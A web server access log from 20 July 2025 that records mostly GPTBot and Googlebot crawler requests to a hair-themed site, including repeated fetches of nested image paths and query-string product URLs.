20.171.207.166 - - [20/Jul/2025:07:16:24 +0000] "GET /fePublicInfo/js/images/hairstyles/js/plugins.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:07:17:19 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/18487060.shtml HTTP/1.1" 200 18671 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.7 - - [20/Jul/2025:07:17:21 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/18487060.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:17:26 +0000] "GET /fePublicInfo/js/images/hairstyles/images/services/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:07:17:35 +0000] "GET /h/u003d800 HTTP/1.1" 200 18225 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.5 - - [20/Jul/2025:07:17:35 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/671520.shtml HTTP/1.1" 200 20356 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:18:28 +0000] "GET /facebook/images/background/images/misc/man.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:19:33 +0000] "GET /facebook/images/background/images/hairstyles/6.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:07:20:24 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/164510.shtml HTTP/1.1" 200 20599 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.5 - - [20/Jul/2025:07:20:28 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/164510.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:20:33 +0000] "GET /facebook/images/background/images/services/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:07:20:45 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/671036.shtml HTTP/1.1" 200 18478 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.5 - - [20/Jul/2025:07:20:47 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/671036.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:21:37 +0000] "GET /facebook/images/background/images/hairstyles/5.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:22:38 +0000] "GET /facebook/images/background/images/services/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:23:43 +0000] "GET /facebook/images/background/images/logo-mobile.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:07:24:17 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/714296.shtml HTTP/1.1" 200 18890 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:24:44 +0000] "GET /facebook/images/background/images/services/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:07:24:50 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/164480.shtml HTTP/1.1" 200 18113 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.7 - - [20/Jul/2025:07:25:34 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/164480.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:25:48 +0000] "GET /facebook/images/background/images/hairstyles/4.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:26:52 +0000] "GET /facebook/images/background/images/hairstyles/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:07:27:55 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/714910.shtml HTTP/1.1" 200 18674 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:27:57 +0000] "GET /facebook/images/background/images/background/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:29:03 +0000] "GET /facebook/images/background/images/hairstyles/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:30:05 +0000] "GET /facebook/images/background/images/services/4.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:31:09 +0000] "GET /facebook/images/background/images/misc/man-2.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:07:31:12 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/72754.shtml HTTP/1.1" 200 19841 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:32:14 +0000] "GET /facebook/images/background/images/background/7.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:33:16 +0000] "GET /facebook/images/background/images/logo.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:34:20 +0000] "GET /facebook/images/background/images/icon.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:07:34:54 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/619710.shtml HTTP/1.1" 200 18580 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:35:21 +0000] "GET /facebook/images/background/images/hairstyles/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:36:22 +0000] "GET /035/images/services/images/icon.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:37:25 +0000] "GET /035/images/services/images/background/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:07:38:06 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/619840.shtml HTTP/1.1" 200 18665 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.5 - - [20/Jul/2025:07:38:13 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/619840.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:38:29 +0000] "GET /035/images/services/images/misc/man.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:39:30 +0000] "GET /035/images/services/images/services/4.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:40:36 +0000] "GET /035/images/services/images/services/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:07:41:35 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/18486914.shtml HTTP/1.1" 200 18440 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:41:40 +0000] "GET /035/images/services/images/logo.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:42:42 +0000] "GET /035/images/services/images/hairstyles/6.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:43:43 +0000] "GET /035/images/services/images/background/7.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:07:43:55 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/670650.shtml HTTP/1.1" 200 18057 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.6 - - [20/Jul/2025:07:44:14 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/670800.shtml HTTP/1.1" 200 20238 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.5 - - [20/Jul/2025:07:44:26 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/670480.shtml HTTP/1.1" 200 18605 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.5 - - [20/Jul/2025:07:44:34 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/670650.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.5 - - [20/Jul/2025:07:44:38 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/670454.shtml HTTP/1.1" 200 18147 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:44:45 +0000] "GET /035/images/services/images/services/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:07:44:50 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/670776.shtml HTTP/1.1" 200 18513 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:45:50 +0000] "GET /035/images/services/images/logo-mobile.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:46:54 +0000] "GET /035/images/services/images/hairstyles/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:07:47:16 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/670590.shtml HTTP/1.1" 200 18693 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.6 - - [20/Jul/2025:07:47:39 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/805596.shtml HTTP/1.1" 200 18485 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:47:54 +0000] "GET /035/images/services/images/hairstyles/4.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:48:59 +0000] "GET /035/images/services/images/hairstyles/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:50:01 +0000] "GET /035/images/services/images/hairstyles/5.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:51:05 +0000] "GET /035/images/services/images/services/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:52:06 +0000] "GET /035/images/services/images/hairstyles/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:53:12 +0000] "GET /035/images/services/images/misc/man-2.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:54:14 +0000] "GET /apis/images/images/hairstyles/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:07:55:12 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/1943760.shtml HTTP/1.1" 200 20742 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:07:55:19 +0000] "GET /apis/images/images/icon.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:56:20 +0000] "GET /apis/images/images/services/4.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:57:22 +0000] "GET /apis/images/images/services/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:58:28 +0000] "GET /apis/images/images/hairstyles/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:07:59:29 +0000] "GET /apis/images/images/hairstyles/6.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:00:34 +0000] "GET /apis/images/images/hairstyles/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:01:36 +0000] "GET /apis/images/images/hairstyles/4.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:02:36 +0000] "GET /apis/images/images/background/7.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:03:41 +0000] "GET /apis/images/images/misc/man-2.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:04:43 +0000] "GET /apis/images/images/background/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:05:45 +0000] "GET /apis/images/images/services/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:06:50 +0000] "GET /apis/images/images/logo.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:07:54 +0000] "GET /apis/images/images/logo-mobile.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:08:55 +0000] "GET /apis/images/images/misc/man.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:09:58 +0000] "GET /apis/images/images/hairstyles/5.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:10:58 +0000] "GET /apis/images/images/services/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
45.227.253.15 - - [20/Jul/2025:08:11:27 +0000] "GET /index.php/jk HTTP/1.1" 200 59 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/10.0.4 Mobile/15E148 Safari/604.1"
20.171.207.166 - - [20/Jul/2025:08:12:00 +0000] "GET /otc/js/images/hairstyles/js/custom-marquee.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:13:06 +0000] "GET /otc/js/images/hairstyles/js/plugins.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:14:06 +0000] "GET /otc/js/images/hairstyles/images/hairstyles/5.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:15:10 +0000] "GET /otc/js/images/hairstyles/images/services/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:08:16:09 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/798990.shtml HTTP/1.1" 200 18653 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:08:16:11 +0000] "GET /otc/js/images/hairstyles/images/logo.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:08:16:18 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/798990.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:08:17:12 +0000] "GET /otc/js/images/hairstyles/images/hairstyles/6.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:18:14 +0000] "GET /otc/js/images/hairstyles/images/logo-mobile.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:19:15 +0000] "GET /otc/js/images/hairstyles/images/services/4.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:20:19 +0000] "GET /otc/js/images/hairstyles/images/misc/man.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:08:21:03 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/237494.shtml HTTP/1.1" 200 18021 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.6 - - [20/Jul/2025:08:21:07 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/237494.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
